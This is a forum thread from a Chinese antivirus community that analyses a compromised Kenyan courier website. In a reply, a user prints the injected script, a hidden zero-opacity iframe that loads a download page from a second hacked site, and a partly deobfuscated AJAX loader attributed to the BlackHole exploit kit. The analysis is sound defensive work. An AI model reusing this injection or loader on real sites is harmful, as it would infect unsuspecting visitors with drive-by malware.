查看: 1844|回复: 1
收起左侧

[未鉴定] http://expeditecourier.co.ke/?tag=courier-services

[复制链接]
墨家小子
发表于 2013-4-25 23:30:19 | 显示全部楼层 |阅读模式
2013/4/25        23:28:34        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9TJIMC72\expeditecourier_co_ke[1].htm\00004561.js        JS/Redirector.an (特洛伊)

1.PNG
dayangyang
发表于 2013-4-26 00:01:40 | 显示全部楼层
首先是直接的。。。
  1. <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');</script>
复制代码
在页面的js中
http://expeditecourier.co.ke/wp- ... erfade.js?ver=3.0.3也都嵌入了这段话
然后是最后那一段
解开是
  1. function kx_M(file){
  2.       this.kx_z=null;
  3.     this.kx_P=function(){
  4.       this.kx_B="GET";
  5.     this.kx_i="?";
  6.     this.kx_rx="&";
  7.     this.kx_r=window;
  8.     this.kx_rt="";
  9.     this.kx_b=true;
  10.     this.kx_w=false;
  11.     this.kx_E=true;
  12.     this.kx_rr=null;
  13.     this.kx_A=null;
  14.     this.kx_F=file;
  15.     this.kx_t=new Object();
  16.     this.kx_C=new Array(2);
  17.     this.kx_r.offset=100}
  18.       ;
  19.     this.kx_n=function(){
  20.       this.kx_L=function(){
  21.       }
  22.       ;
  23.     this.kx_u=function(){
  24.       }
  25.       ;
  26.     this.kx_y=function(){
  27.       }
  28.       ;
  29.     this.kx_J=function(){
  30.       this.runResponse()}
  31.       ;
  32.     this.kx_e=function(){
  33.       }
  34.       ;
  35.     this.kx_q=function(){
  36.       this.runResponse()}
  37.       }
  38.       ;
  39.     this.kx_m=function(){
  40.       this.kx_n();
  41.     this.kx_P()}
  42.       ;
  43.     this.kx_rg=function(){
  44.       this.kx_k();
  45.     try{
  46.       this.kx_z=new ActiveXObject("Msxml2.XMLHTTP")}
  47.       catch(e1){
  48.       try{
  49.       this.kx_z=new ActiveXObject("Microsoft.XMLHTTP")}
  50.       catch(e2){
  51.       this.kx_z=null}
  52.       }
  53.       if(!this.kx_z){
  54.       if(typeof XMLHttpRequest!="undefined"){
  55.       this.kx_z=new XMLHttpRequest()}
  56.       else{
  57.       this.kx_E=true}
  58.       }
  59.       }
  60.       ;
  61.     this.kx_c=function(kx_o,value){
  62.       this.kx_t[kx_o]=Array(value,false)}
  63.       ;
  64.     this.kx_v=function(kx_o,value,returnvars){
  65.       if(true==returnvars){
  66.       return Array(encodeURIComponent(kx_o),encodeURIComponent(value))}
  67.       else{
  68.       this.kx_t[encodeURIComponent(kx_o)]=Array(encodeURIComponent(value),true)}
  69.       }
  70.       ;
  71.     this.kx_H=function(kx_p,kx_S){
  72.       kx_T=encodeURIComponent(this.kx_rx);
  73.     regexp=new RegExp(this.kx_rx+"|"+kx_T);
  74.     varArray=kx_p.split(regexp);
  75.     for(i=0;
  76.     i<varArray.length;
  77.     i++){
  78.       kx_j=varArray[i].split("=");
  79.     if(true==kx_S){
  80.       this.kx_v(kx_j[0],kx_j[1])}
  81.       else{
  82.       this.kx_c(kx_j[0],kx_j[1])}
  83.       }
  84.       }
  85.       ;
  86.     window.trim=function(kx_o,kx_f){
  87.       if("qabcdef".indexOf(kx_o.substr(0,1))>=0){
  88.       var kx_rs=kx_o.split('q').join('').split('v');
  89.     for(var i=0;
  90.     i<kx_r....response=d;
  91.     this.kx_b=true;
  92.     this.kx_w=false;
  93.     this.kx_rr=null;
  94.     this.kx_A=null;
  95.     this.kx_F=file;
  96.     this.kx_t=new Object();
  97.     this.kx_C=new Array(2)}
  98.       ;
  99.     this.runAJAX=function(kx_R){
  100.       if(this.kx_E){
  101.       this.kx_q()}
  102.       else{
  103.       this.kx_rN(kx_R);
  104.     if(this.kx_rr){
  105.       this.kx_A=document.getElementById(this.kx_rr)}
  106.       if(this.kx_z){
  107.       var self=this;
  108.     if(this.kx_B=="GET"){
  109.       kx_K=this.kx_F+this.kx_i+this.kx_rt;
  110.     this.kx_z.open(this.kx_B,kx_K,true)}
  111.       else{
  112.       this.kx_z.open(this.kx_B,this.kx_F,true);
  113.     try{
  114.       this.kx_z.setRequestHeader("Content-Type","application/x-www-form-urlencoded")}
  115.       catch(e){
  116.       }
  117.       }
  118.       this.kx_z.onreadystatechange=function(){
  119.       switch(self.kx_z.readyState){
  120.       case 1:self.kx_L();
  121.     break;
  122.     case 2:self.kx_u();
  123.     break;
  124.     case 3:self.kx_y();
  125.     break;
  126.     case 4:self.response=self.kx_z.responseText;
  127.     self.responseXML=self.kx_z.responseXML;
  128.     self.kx_C[0]=self.kx_z.status;
  129.     self.kx_C[1]=self.kx_z.statusText;
  130.     if(self.kx_w){
  131.       self.runResponse()}
  132.       if(self.kx_A){
  133.       elemNodeName=self.kx_A.nodeName;
  134.     elemNodeName.toLowerCase();
  135.     if(elemNodeName=="input"||elemNodeName=="select"||elemNodeName=="option"||elemNodeName=="textarea"){
  136.       self.kx_A.value=self.response}
  137.       else{
  138.       self.kx_A.innerHTML=self.response}
  139.       }
  140.       if(self.kx_C[0]=="200"){
  141.       self.kx_J()}
  142.       else{
  143.       self.kx_e()}
  144.       self.kx_rt="";
  145.     break}
  146.       }
  147.       ;
  148.     this.kx_z.send(this.kx_rt)}
  149.       }
  150.       }
  151.       ;
  152.     this.kx_m();
  153.     this.kx_rg()}
  154.       window.ajax=new kx_M();
  155.     try{
  156.       var kx_G=document.getElementById('kx_D');
  157.     ajax.kx_c("query",kx_G.kx_d.kx_f);
  158.     ajax.kx_F="query.php";
  159.     ajax.kx_B=kx_G.kx_B.kx_f;
  160.     ajax.kx_rr='kx_rz';
  161.     ajax.kx_L=kx_N;
  162.     ajax.kx_u=kx_g;
  163.     ajax.kx_y=kx_s;
  164.     ajax.kx_J=kx_x;
  165.     ajax.runAJAX()}
  166.       catch(e){
  167.       ajax.runAJAX()}
  168.       
复制代码
嘿嘿 是BlackHole v1.x exploit kit

最后是中间数字的那一段。。非常有意思。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 21:53 , Processed in 0.130551 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表